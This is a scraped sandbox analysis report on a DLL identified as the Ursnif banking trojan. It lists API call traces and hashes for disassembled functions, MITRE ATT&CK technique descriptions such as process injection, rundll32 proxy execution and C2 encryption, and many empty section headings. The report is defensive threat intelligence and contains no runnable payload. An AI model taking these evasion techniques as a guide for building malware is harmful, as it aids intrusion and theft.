Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 7c80d34cce002124ad0ac1e5c7c52f4949be0273e4cc4a07cc49b62caadfdbf3
Instruction ID: 802d4e5c49b8a85cafab15fbf4e4d92eab2662495ee6f580a07e1c8b5cc65da8
Opcode Fuzzy Hash: 7c80d34cce002124ad0ac1e5c7c52f4949be0273e4cc4a07cc49b62caadfdbf3
Instruction Fuzzy Hash: BDF04F76900118FBCF11DFA8DC89CCE7BACEF083547014166FA04D7101E735EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007921C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(050187FA,00000000,00000000,00000000,00797100,00000000), ref: 007921D1
lstrlen.KERNEL32(?), ref: 007921D9

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

lstrcpy.KERNEL32(00000000,050187FA), ref: 007921ED
lstrcat.KERNEL32(00000000,?), ref: 007921F8

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 97275bd8ccec66e70b45080425dcb59c04b9820be18a9e935b015755cb9ae7ea
Instruction ID: 82c7ebd837b6e21df20968794dd82f1c67961113d8848905d04ae9cbbde8e6f5
Opcode Fuzzy Hash: 97275bd8ccec66e70b45080425dcb59c04b9820be18a9e935b015755cb9ae7ea
Instruction Fuzzy Hash: 88E06D73901226B787115BACAC48C9BBBACEE89611304441BFB1093110C7288816CBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report mental.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00DE39C5, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 6D4CA7ED, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Function 6D471144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00DE4454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 00DE2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6D471B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6D471E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6D471F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6D471EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00DE46D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Function 00DE2022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 6D471C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 00DE6384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00DE53F2, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00DE113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00DE6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON